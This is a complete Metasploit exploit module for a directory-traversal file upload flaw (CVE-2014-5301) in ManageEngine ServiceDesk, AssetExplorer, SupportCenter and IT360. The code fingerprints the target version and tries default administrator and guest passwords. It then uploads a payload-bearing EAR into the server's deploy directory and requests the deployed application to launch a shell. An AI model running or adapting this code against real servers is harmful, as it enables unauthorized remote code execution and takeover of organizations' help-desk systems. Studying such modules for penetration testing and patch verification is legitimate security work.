    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ManageEngine Multiple Products Authenticated File Upload', 'Description' => %q{ This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk, AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts the upload does not handle correctly '../' sequences, which can be abused to write in the file system. Authentication is needed to exploit this vulnerability, but this module will attempt to login using the default credentials for the administrator and guest accounts. Alternatively you can provide a pre-authenticated cookie or a username / password combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer, SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been been tested successfully in Windows and Linux on several versions. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-5301'], ['OSVDB', '116733'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => false, # Privileged on Windows but not on Linux targets 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Automatic', { } ], [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9', { 'attachment_path' => '/workorder/Attachment.jsp' } ], [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1', { 'attachment_path' => '/common/FileAttachment.jsp' } ], [ 'IT360 v8-v10.4', { 'attachment_path' => '/common/FileAttachment.jsp' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 15 2014')) register_options( [ Opt::RPORT(8080), OptString.new('JSESSIONID', [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']), OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']), OptString.new('USERNAME', [true, 'The username to login as', 'guest']), OptString.new('PASSWORD', [true, 'Password for the specified username', 'guest']), OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to']) ], self.class) end def get_version res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360) version = [ 9999, 9999, 0, 'sd' ] if res && res.code == 200 if res.body.to_s =~ /ManageEngine ServiceDesk/ if res.body.to_s =~ /&nbsp;&nbsp;\|&nbsp;&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ output = $1 version = [output[0].to_i, output[2].to_i, '0', 'sd'] end if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/ # newer builds version[2] = $1.to_i elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # older builds version[2] = $1.to_i end elsif res.body.to_s =~ /ManageEngine AssetExplorer/ if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ || res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/ output = $1 version = [output[0].to_i, output[2].to_i, 0, 'ae'] end if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/ version[2] = $1.to_i end elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/ # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version version[3] = 'sc' if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/ # ... but get the build number if we can find it version[2] = $1.to_i end elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/ # IT360 newer versions version[3] = 'it' end elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/ # IT360 older versions, not a very good detection string but there is no alternative? version[3] = 'it' end version end def check version = get_version # TODO: put fixed version on the two ifs below once (if...) products are fixed # sd was fixed on build 9031 # ae and sc still not fixed if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') || (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') || (version[3] == 'sc' && version[2] < 99999) return Exploit::CheckCode::Appears end if (version[2] > 9030 && version[3] == 'sd') || (version[2] > 99999 && version[3] == 'ae') || (version[2] > 99999 && version[3] == 'sc') return Exploit::CheckCode::Safe else # An IT360 check always lands here, there is no way to get the version easily return Exploit::CheckCode::Unknown end end def authenticate_it360(port, path, username, password) if datastore['DOMAIN_NAME'] == nil vars_post = { 'LOGIN_ID' => username, 'PASSWORD' => password, 'isADEnabled' => 'false' } else vars_post = { 'LOGIN_ID' => username, 'PASSWORD' => password, 'isADEnabled' => 'true', 'domainName' => datastore['DOMAIN_NAME'] } end res = send_request_cgi({ 'rport' => port, 'method' => 'POST', 'uri' => normalize_uri(path), 'vars_get' => { 'service' => 'ServiceDesk', 'furl' => '/', 'timestamp' => Time.now.to_i }, 'vars_post' => vars_post }) if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed" return res.get_cookies else return nil end end def get_it360_cookie_name res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("/") }) cookie = res.get_cookies if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/ return $1 else return nil end end def login_it360 # Do we already have a valid cookie? If yes, just return that. if datastore['IAMAGENTTICKET'] cookie_name = get_it360_cookie_name cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';' return cookie end # get the correct path, host and port res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/') }) if res && res.redirect? uri = [ res.redirection.port, res.redirection.path ] else return nil end cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) if cookie != nil return cookie elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil # we've tried with the default guest password, now let's try with the default admin password cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator') if cookie != nil return cookie else # Try one more time with the default admin login for some versions cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin') if cookie != nil return cookie end end end nil end # # Authenticate and validate our session cookie. We need to submit credentials to # j_security_check and then follow the redirect to HomePage.do to create a valid # authenticated session. # def authenticate(cookie, username, password) res = send_request_cgi!({ 'method' => 'POST', 'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')), 'ctype' => 'application/x-www-form-urlencoded', 'cookie' => cookie, 'vars_post' => { 'j_username' => username, 'j_password' => password, 'logonDomainName' => datastore['DOMAIN_NAME'] } }) if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/)) # sd and ae respond with 302 while sc responds with a 200 return true else return false end end def login # Do we already have a valid cookie? If yes, just return that. if datastore['JSESSIONID'] != nil cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';' return cookie end # First we get a valid JSESSIONID to pass to authenticate() res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/') }) if res && res.code == 200 cookie = res.get_cookies authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD']) if authenticated return cookie elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil # we've tried with the default guest password, now let's try with the default admin password authenticated = authenticate(cookie, 'administrator', 'administrator') if authenticated return cookie else # Try one more time with the default admin login for some versions authenticated = authenticate(cookie, 'admin', 'admin') if authenticated return cookie end end end end nil end def send_multipart_request(cookie, payload_name, payload_str) if payload_name =~ /\.ear/ upload_path = '../../server/default/deploy' else upload_path = rand_text_alpha(4+rand(4)) end post_data = Rex::MIME::Message.new if @my_target == targets[1] # old style post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"") post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"") post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"") post_data.add_part('', nil, nil, "form-data; name=\"vec\"") post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"") post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"") post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"") post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"") else post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"") post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"") post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"") end data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(@my_target['attachment_path']), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => cookie }) return res end def pick_target return target if target.name != 'Automatic' version = get_version if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') || (version[0] == 4 && version[3] == 'ae') || (version[3] == 'sc') # These are all "old style" versions (sc is always old style) return targets[1] elsif version[3] == 'it' return targets[3] else return targets[2] end end def exploit if check == Exploit::CheckCode::Safe fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable") end print_status("#{peer} - Selecting target...") @my_target = pick_target print_status("#{peer} - Selected target #{@my_target.name}") if @my_target == targets[3] cookie = login_it360 else cookie = login end if cookie.nil? fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate") end # First we generate the WAR with the payload... war_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => war_app_base }) # ... and then we create an EAR file that will contain it. ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4)) app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" app_xml << '<application>' app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>" app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>" app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>" # Zipping with CM_STORE to avoid errors while decompressing the zip # in the Java vulnerable application ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) ear_file.add_file(war_app_base + '.war', war_payload.to_s) ear_file.add_file('META-INF/application.xml', app_xml) ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear' if @my_target != targets[3] # Linux doesn't like it when we traverse non existing directories, # so let's create them by sending some random data before the EAR. # (IT360 does not have a Linux version so we skip the bogus file for it) print_status("#{peer} - Uploading bogus file...") res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4))) if res && res.code != 200 fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed") end end # Now send the actual payload print_status("#{peer} - Uploading EAR file...") res = send_multipart_request(cookie, ear_file_name, ear_file.pack) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end
  15. HireHackking

    Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape

    HireHackking posted a blog entry in Hacker Technology
    // Requires Lorgnette: https://github.com/rodionovd/liblorgnette // clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation // ianbeer #include <dlfcn.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> #include <xpc/xpc.h> #include <CoreFoundation/CoreFoundation.h> #include <mach/mach.h> #include <mach/mach_vm.h> #include <mach/task.h> #include <mach-o/dyld_images.h> #include "liblorgnette/lorgnette.h" /* find the base address of CoreFoundation for the ROP gadgets */ void* find_library_load_address(const char* library_name){ kern_return_t err; // get the list of all loaded modules from dyld // the task_info mach API will get the address of the dyld all_image_info struct for the given task // from which we can get the names and load addresses of all modules task_dyld_info_data_t task_dyld_info; mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT; err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count); const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr; const struct dyld_image_info* image_infos = all_image_infos->infoArray; for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){ const char* image_name = image_infos[i].imageFilePath; mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress; if (strstr(image_name, library_name)){ return (void*)image_load_address; } } return NULL; } struct heap_spray { void* fake_objc_class_ptr; // -------+ uint8_t pad0[0x10]; // | uint64_t first_gadget; // | uint8_t pad1[0x8]; // | uint64_t null0; // | uint64_t pad3; // | uint64_t pop_rdi_rbp_ret; // | uint64_t rdi; // | uint64_t rbp; // | uint64_t system; // | struct fake_objc_class_t { // | char pad[0x10]; // <----------+ void* cache_buckets_ptr; //--------+ uint64_t cache_bucket_mask; // | } fake_objc_class; // | struct fake_cache_bucket_t { // | void* cached_sel; // <--------+ //point to the right selector void* cached_function; // will be RIP :) } fake_cache_bucket; char command[256]; }; xpc_connection_t connect(){ xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); xpc_connection_set_event_handler(conn, ^(xpc_object_t event) { xpc_type_t t = xpc_get_type(event); if (t == XPC_TYPE_ERROR){ printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); } printf("received an event\n"); }); xpc_connection_resume(conn); return conn; } void go(){ void* heap_spray_target_addr = (void*)0x120202000; struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0); memset(hs, 'C', 0x1000); hs->null0 = 0; hs->fake_objc_class_ptr = &hs->fake_objc_class; hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket; hs->fake_objc_class.cache_bucket_mask = 0; // nasty hack to find the correct selector address :) uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release"); uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector uint64_t sel = msgrefs[1]; printf("%p\n", sel); hs->fake_cache_bucket.cached_sel = sel; uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation"); // pivot: /* push rax add eax, [rax] add [rbx+0x41], bl pop rsp pop r14 pop r15 pop rbp ret */ hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here // jump over the NULL then so there's more space: //pop, pop, pop, ret: //and keep stack correctly aligned hs->first_gadget = CoreFoundation_base + 0x46ef7; hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226; hs->system = dlsym(RTLD_DEFAULT, "system"); hs->rdi = &hs->command; strcpy(hs->command, "touch /tmp/hello_networkd"); size_t heap_spray_pages = 0x40000; size_t heap_spray_bytes = heap_spray_pages * 0x1000; char* heap_spray_copies = malloc(heap_spray_bytes); for (int i = 0; i < heap_spray_pages; i++){ memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000); } xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes); xpc_dictionary_set_uint64(msg, "type", 6); xpc_dictionary_set_uint64(msg, "connection_id", 1); xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0); xpc_object_t conn_list = xpc_array_create(NULL, 0); xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_string(arr_dict, "hostname", "example.com"); xpc_array_append_value(conn_list, arr_dict); xpc_dictionary_set_value(params, "connection_entry_list", conn_list); char* long_key = malloc(1024); memset(long_key, 'A', 1023); long_key[1023] = '\x00'; xpc_dictionary_set_string(params, long_key, "something or other that's not important"); uint64_t uuid[] = {0, 0x120200000}; xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid); xpc_dictionary_set_uint64(params, "start", 0); xpc_dictionary_set_uint64(params, "duration", 0); xpc_dictionary_set_value(msg, "parameters", params); xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_int64(state, "power_slot", 0); xpc_dictionary_set_value(msg, "state", state); xpc_object_t conn = connect(); printf("connected\n"); xpc_connection_send_message(conn, msg); printf("enqueued message\n"); xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");}); xpc_release(msg); } int main(){ go(); printf("entering CFRunLoop\n"); for(;;){ CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE); } return 0; }
  16. HireHackking

    WordPress Plugin Pixarbay Images 2.3 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    Mogwai Security Advisory MSA-2015-01 ---------------------------------------------------------------------- Title: WP Pixarbay Images Multiple Vulnerabilities Product: Pixarbay Images (Wordpress Plugin) Affected versions: 2.3 Impact: high Remote: yes Product link: https://wordpress.org/plugins/pixabay-images/ Reported: 14/01/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- Pixabay Images is a WordPress plugin that let's you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required. Business recommendation: ---------------------------------------------------------------------- Update to version 2.4 Vulnerability description: ---------------------------------------------------------------------- 1) Authentication bypass The plugin does not correctly check if the user is logged in. Certain code can be called without authentication 2) Arbitrary file upload The plugin code does not validate the host in the provided download URL, which allows to upload malicious files, including PHP code. 3) Path Traversal Certain values are not sanitized before they are used in a file operation. This allows to store files outside of the "download" folder. 4) Cross Site Scripting (XSS) The generated author link uses unsanitized user values which can be abused for Cross Site Scripting (XSS) attacks. Proof of concept: ---------------------------------------------------------------------- The following PoC Python script can be used to download PHP files from a attacker controlled host. #!/usr/bin/env python import argparse import httplib, urllib from urlparse import urlparse def exploit(target_url, shellcode_url): target = urlparse(target_url) params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url, 'image_user': 'none', 'q':'xxx/../../../../../../mogwai'}) headers = headers = {"Content-type": "application/x-www-form-urlencoded"} print "[+] Sending download request...." conn = httplib.HTTPConnection(target.netloc) conn.request("POST", target.path + "/wp-admin/", params, headers) response = conn.getresponse() response_data = response.read() if response.status != 200 and response_data != "Error: File attachment metadata error": print "[-] Something went wrong" print response_data exit() conn.close() # ---- Main code ---------------- parser = argparse.ArgumentParser() parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/") parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php") print "----------------------------------------------" print " pixabay upload wordpress plugin exploit PoC" print " Mogwai security" print "----------------------------------------------" arguments = parser.parse_args() exploit(arguments.target_url, arguments.shellcode_url) Vulnerable / tested versions: ---------------------------------------------------------------------- Pixabay Images 2.3 Disclosure timeline: ---------------------------------------------------------------------- 14/01/2014: Reporting issues to the plugin author 15/01/2014: Release of fixed version (2.4) 19/01/2014: Public advisory Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de
  17. HireHackking

    Apple Mac OSX 10.9.5 - IOKit IntelAccelerator Null Pointer Dereference

    HireHackking posted a blog entry in Hacker Technology
    // clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0 // ianbeer #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/stat.h> #include <unistd.h> #include <CoreFoundation/CoreFoundation.h> #include <IOKit/IOKitLib.h> uint64_t kernel_symbol(char* sym){ char cmd[1024]; strcpy(cmd, "nm -g /mach_kernel | grep "); strcat(cmd, sym); strcat(cmd, " | cut -d' ' -f1"); FILE* f = popen(cmd, "r"); char offset_str[17]; fread(offset_str, 16, 1, f); pclose(f); offset_str[16] = '\x00'; uint64_t offset = strtoull(offset_str, NULL, 16); return offset; } uint64_t leaked_offset_in_kext(){ FILE* f = popen("nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1", "r"); char offset_str[17]; fread(offset_str, 16, 1, f); pclose(f); offset_str[16] = '\x00'; uint64_t offset = strtoull(offset_str, NULL, 16); offset += 0x10; //offset from symbol to leaked pointer return offset; } uint64_t leak(){ io_iterator_t iter; CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault), kIOServicePlane, CFSTR("AAPL,iokit-ndrv"), kCFAllocatorDefault, kIORegistryIterateRecursively); if (CFGetTypeID(p) != CFDataGetTypeID()){ printf("expected CFData\n"); return 1; } if (CFDataGetLength(p) != 8){ printf("expected 8 bytes\n"); return 1; } uint64_t leaked = *((uint64_t*)CFDataGetBytePtr(p)); return leaked; } extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef); uint64_t kext_load_addr(char* target_name){ uint64_t addr = 0; CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL); CFIndex count = CFDictionaryGetCount(kd); void **keys; void **values; keys = (void **)malloc(sizeof(void *) * count); values = (void **)malloc(sizeof(void *) * count); CFDictionaryGetKeysAndValues(kd, (const void **)keys, (const void **)values); for(CFIndex i = 0; i < count; i++){ const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman); if (strcmp(name, target_name) == 0){ CFNumberGetValue(CFDictionaryGetValue(values[i], CFSTR("OSBundleLoadAddress")), kCFNumberSInt64Type, &addr); printf("%s: 0x%016llx\n", name, addr); break; } } return addr; } uint64_t load_addr(){ uint64_t addr = 0; CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL); CFIndex count = CFDictionaryGetCount(kd); void **keys; void **values; keys = (void **)malloc(sizeof(void *) * count); values = (void **)malloc(sizeof(void *) * count); CFDictionaryGetKeysAndValues(kd, (const void **)keys, (const void **)values); for(CFIndex i = 0; i < count; i++){ const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman); if (strcmp(name, "com.apple.iokit.IONDRVSupport") == 0){ CFNumberGetValue(CFDictionaryGetValue(values[i], CFSTR("OSBundleLoadAddress")), kCFNumberSInt64Type, &addr); printf("%s: 0x%016llx\n", name, addr); break; } } return addr; } uint64_t* build_vtable(uint64_t kaslr_slide, size_t* len){ uint64_t kernel_base = 0xffffff8000200000; kernel_base += kaslr_slide; int fd = open("/mach_kernel", O_RDONLY); if (!fd) return NULL; struct stat _stat; fstat(fd, &_stat); size_t buf_len = _stat.st_size; uint8_t* buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE|MAP_PRIVATE, fd, 0); if (!buf) return NULL; /* this stack pivot to rax seems to be reliably present across mavericks versions: push rax add [rax], eax add [rbx+0x41], bl pop rsp pop r14 pop r15 pop rbp ret */ uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e}; uint8_t* pivot_loc = memmem(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes)); uint64_t pivot_gadget_offset = (uint64_t)(pivot_loc - buf); printf("offset of pivot gadget: %p\n", pivot_gadget_offset); uint64_t pivot = kernel_base + pivot_gadget_offset; /* pop rdi ret */ uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3}; uint8_t* pop_rdi_ret_loc = memmem(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes)); uint64_t pop_rdi_ret_gadget_offset = (uint64_t)(pop_rdi_ret_loc - buf); printf("offset of pop_rdi_ret gadget: %p\n", pop_rdi_ret_gadget_offset); uint64_t pop_rdi_ret = kernel_base + pop_rdi_ret_gadget_offset; /* pop rsi ret */ uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3}; uint8_t* pop_rsi_ret_loc = memmem(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes)); uint64_t pop_rsi_ret_gadget_offset = (uint64_t)(pop_rsi_ret_loc - buf); printf("offset of pop_rsi_ret gadget: %p\n", pop_rsi_ret_gadget_offset); uint64_t pop_rsi_ret = kernel_base + pop_rsi_ret_gadget_offset; /* pop rdx ret */ uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3}; uint8_t* pop_rdx_ret_loc = memmem(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes)); uint64_t pop_rdx_ret_gadget_offset = (uint64_t)(pop_rdx_ret_loc - buf); printf("offset of pop_rdx_ret gadget: %p\n", pop_rdx_ret_gadget_offset); uint64_t pop_rdx_ret = kernel_base + pop_rdx_ret_gadget_offset; munmap(buf, buf_len); close(fd); /* in IOAcceleratorFamily2 two locks are held - r12 survives the pivot, this should unlock all the locks from there: __text:0000000000006F80 lea rsi, unk_32223 __text:0000000000006F87 mov rbx, [r12+118h] __text:0000000000006F8F mov rax, [rbx] __text:0000000000006F92 mov rdi, rbx __text:0000000000006F95 xor edx, edx __text:0000000000006F97 call qword ptr [rax+858h] __text:0000000000006F9D mov rdi, rbx ; this __text:0000000000006FA0 call __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void) __text:0000000000006FA5 mov rdi, [rbx+88h] __text:0000000000006FAC call _IOLockUnlock __text:0000000000006FB1 __text:0000000000006FB1 loc_6FB1: ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j __text:0000000000006FB1 xor ecx, ecx __text:0000000000006FB3 jmp loc_68BC ... __text:00000000000068BC mov eax, ecx ; jumptable 00000000000067F1 default case __text:00000000000068BE add rsp, 38h __text:00000000000068C2 pop rbx __text:00000000000068C3 pop r12 __text:00000000000068C5 pop r13 __text:00000000000068C7 pop r14 __text:00000000000068C9 pop r15 __text:00000000000068CB pop rbp __text:00000000000068CC retn */ uint64_t unlock_locks = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2") + kaslr_slide + 0x6f80; printf("0x%016llx\n", unlock_locks); uint64_t KUNCExecute = kernel_symbol("_KUNCExecute") + kaslr_slide; uint64_t thread_exception_return = kernel_symbol("_thread_exception_return") + kaslr_slide; //char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator"; char* payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"; uint64_t rop_stack[] = { 0, //pop r14 0, //pop r15 0, //pop rbp +10 unlock_locks, pivot, //+20 virtual call is rax+20 0, //+10 0, //+18 0, 0, //+28 0, 0, //+38 0, //pop rbx 0, //pop r12 0, //pop r13 0, //pop r14 0, //pop r15 0, //pop rbp pop_rdi_ret, (uint64_t)payload, pop_rsi_ret, 0, pop_rdx_ret, 0, KUNCExecute, thread_exception_return }; uint64_t* r = malloc(sizeof(rop_stack)); memcpy(r, rop_stack, sizeof(rop_stack)); *len = sizeof(rop_stack); return r; } void trigger(void* vtable, size_t vtable_len){ //need to overallocate and touch the pages since this will be the stack: mach_vm_address_t addr = 0x41420000 - 10 * 0x1000; mach_vm_allocate(mach_task_self(), &addr, 0x20*0x1000, 0); memset(addr, 0, 0x20*0x1000); memcpy((void*)0x41420000, vtable, vtable_len); //map NULL page vm_deallocate(mach_task_self(), 0x0, 0x1000); addr = 0; vm_allocate(mach_task_self(), &addr, 0x1000, 0); char* np = 0; for (int i = 0; i < 0x1000; i++){ np[i] = 'A'; } volatile uint64_t* zero = 0; *zero = 0x41420000; //trigger vuln CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator"); io_iterator_t iterator; kern_return_t err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator); io_service_t service = IOIteratorNext(iterator); io_connect_t conn = MACH_PORT_NULL; err = IOServiceOpen(service, mach_task_self(), 2, &conn); addr = 0x12345000; mach_vm_size_t size = 0x1000; err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere); } int main() { uint64_t leaked_ptr = leak(); uint64_t kext_load_addr = load_addr(); // get the offset of that pointer in the kext: uint64_t offset = leaked_offset_in_kext(); // sanity check the leaked address against the symbol addr: if ( (leaked_ptr & 0xfff) != (offset & 0xfff) ){ printf("the leaked pointer doesn't match up with the expected symbol offset\n"); return 1; } uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr; printf("kaslr slide: %p\n", kaslr_slide); size_t vtable_len = 0; void* vtable = build_vtable(kaslr_slide, &vtable_len); trigger(vtable, vtable_len); return 0; }
  18. HireHackking

    Apple Mac OSX 10.10 - IOKit IntelAccelerator Null Pointer Dereference

